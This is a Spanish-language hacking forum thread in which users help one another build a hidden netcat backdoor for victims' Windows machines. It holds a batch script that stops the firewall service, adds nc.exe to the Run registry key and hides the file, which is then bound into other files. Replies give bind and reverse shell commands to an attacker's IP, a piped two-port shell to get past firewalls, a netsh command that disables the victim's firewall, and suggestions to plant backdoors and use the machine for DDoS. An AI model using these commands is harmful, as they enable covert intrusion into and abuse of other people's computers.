Bueno aqui les pongo lo que hago con el nc..ya que no me funciona:
1.)Lo primero meto el nc.exe en "%systemroot%"(windows).
2.)Creo un .bat:
Citar
@echo off
cls
net stop SharedAccess
rem :con esto detengo el firewall + antivirus no?
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "winexe" /t REG_SZ /d "%systemroot%\nc.exe" /F
rem :agrego el nc.exe para que se inicie con windows
ping -n 5 127.0.0.1
rem :spero un poco
attrib +a +s +h "%systemroot%\nc.exe"
rem :Escondo el nc.exe
exit
Los rems no los coloco en el .bat ;D ;D
...Lo que keria saber es como abro un puerto en batch...i si podria acer la conexion inversa en batch.
3.)Bindeo el bat mas el nc, cn mas cosas i les digo que se extraigan en "windows"(ejecutandose a su vez...i asi conectarme...)
P.D.Diganme los fallos para poder solucionarlo.
Citarreg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "winexe" /t REG_SZ /d "%systemroot%\nc.exe" /F
El fallo es q no sabes usar el netcat. Busca en el foro.
Cita de: <~>FeRcHu<~> en 1 Octubre 2007, 22:48 PM
Citarreg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "winexe" /t REG_SZ /d "%systemroot%\nc.exe" /F
El fallo es q no sabes usar el netcat. Busca en el foro.
Que le pasa a esa linea del code???
Lo que esta mal es que no basta con ejecutar el nc a "secas" tenes que especificar parametros para que escuche y en que puerto.
Aparte de esto mirate la sintaxis de netsh que te sirve para abrir puertos. Salu2
Cita de: darkraider en 2 Octubre 2007, 11:48 AM
Lo que esta mal es que no basta con ejecutar el nc a "secas" tenes que especificar parametros para que escuche y en que puerto.
Aparte de esto mirate la sintaxis de netsh que te sirve para abrir puertos. Salu2
gracias....Pero aora mira
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "winexe" /t REG_SZ /d "%systemroot%\nc.exe -vv -l -p 6000" /F
con eso abriria el puerto 6000 para que estuviera a la escucha??
i luego con un netstat -a...Pues averiguo su ip. i ya esta no??
Si con eso haces que el netcat escuche en el 6000, pero el solito no va a abrir el puerto. Te dije que leas sobre netsh para abrir puertos por consola del firewall de Windows. Lee primero, intentalo y si y solo si te surge una duda al respecto, pregunta. De onda te lo digo, jode escribir algo que ya esta escrito. Salu2
Hola a todos, no sé si llegue tarde a éste Post, pero igual.
Viejo, aquí te dejo los parámetros del comando NETSH para que juegues con el Firewall y toda la configuración de la Red.
Uso: netsh [-a AliasFile] [-c Context] [-r RemoteMachine]
[Command | -f ScriptFile]
Los siguientes comandos est n disponibles:
Comandos en este contexto:
? - Muestra una lista de comandos.
add - Agrega una entrada de configuraci¢n a una lista de entradas.
bridge - Cambia al contexto `netsh bridge'.
delete - Elimina la entrada de una configuraci¢n de la lista de entradas.
diag - Cambia al contexto `netsh diag'.
dump - Muestra una secuencia de comandos de configuraci¢n.
exec - Ejecuta un archivo de secuencia de comandos.
firewall - Cambia al contexto `netsh firewall'.
help - Muestra una lista de comandos.
interface - Cambia al contexto `netsh interface'.
ras - Cambia al contexto `netsh ras'.
routing - Cambia al contexto `netsh routing'.
set - Actualiza la configuraci¢n de la informaci¢n.
show - Muestra informaci¢n.
winsock - Cambia al contexto `netsh winsock'.
Espero que te sirva, saludos
Citarnc.exe -vv -l -p 6000
No te va a resultar ya que primeramente la persona no deberia ver nada asi que Debes quitarle el
-vv además Debes agregarle
-d (die console) ya que si cierra la ventana entonces se desconectará... también Debes especificar que utilizará la consola de comandos a ejecutar si es eso lo que quieres.
Windows:
nc.exe -d -e cmd.exe -L -p 6000
Linux:
nc -l -d -p 6000 -e /bin/sh
sudo nc -l -d -p 6000 -e /bin/sh
Eh... ¿Die console? esa función es nueva en el Netcat...
Yo conocía era a DETACH ó "Separado" de la consola.. Jaja..
Y sí, todo depende de lo que quieras hacer... si quieres chatear con tu víctima, sí te serviría esa linea de comandos:
"nc.exe -l -p 6000"
Con eso tú desde tu casa te conectas y le dices "Hola, soy yo".
Si quieres una Shell remota de la víctima, tienes varias (Bastantes) formas de hacerlo..
1.-en caso de que tu víctima no tenga el Firewall activado para que no te rebote la conexión..
"nc -d -e cmd.exe -l -p 6000"
2.- En caso de que tenga el Firewall Activado, pues, hagamos que sea tu victima quién te hackee a tí xD, ésto es posible porque Netcat ejecuta programas con la opción "Execute" (-e) por conexiones entrantes ó salientes, da igual:
Primero deja en tu casa un Netcat a la escucha en el puerto al que tu víctima se vaya a conectar:
"nc -v -v -l -p 6000"
Ahora ejecuta ésto en la Pc victima:
"nc -d -e cmd.exe TU_IP_Ó_DNS 6000"
¡Voilá!, tienes una shell remota, pero si quieres algo más "Educativo", sáltate el Firewall de tu víctima de la siguiente manera:
Deja en tu casa 2 shells abiertas ejecutando a Netcat en modo escucha en los puertos 80 (http) y 25 (smtp):
C:\>nc -v -v -l -p 80
C:\>nv -v -v -l -p 25
Ahora ve a dónde tu víctima y ejecuta ésto:
"nc -d TU_IP_Ó_DNS 80 | cmd | nc -d TU_IP_Ó_DNS 25"
Listo, ahora ¿Qué pasó?
Pues, deberás escribir los comandos en la Shell que dejaste escuchando en el puerto 80.. ¿Pero no te responde nada? jaja, las respuestas a los comandos que escribas por esa shell saldrán en la shell que dejaste escuchando en el puerto 25..
¡Voilá! Otra shell remota
NOTA: Es obvio que tienes que desactivar tu firewall para que la víctima se conecte contigo.
Y una vez que tengas la shell de la víctima, ¿Por qué no desactivar el de él?
C:\Documents and settings\Victima>Netsh FIREWALL set opmode mode = DISABLE
Listo, Firewall desactivado :P
Para activarlo de nuevo sólo escribe lo mismo y suplanta DISABLE por ENABLE
Bájale por TFTP un servidor Ftp "Troyanizado", ejecutalo ocultamente (Serv-U permite hacer eso (-h)) y tendrás vista de todos sus archivos de manera "Gráfica" y no por consola.
Agrégale al Registro de Windows uno ó varios Backdoors, tienes infinidad de formas de hacerlo.
Aprovecha a tirar tus ataques por esa shell, utilízala como Zombie para ataques D.D.O.S., no sé, sólo ponte creativo..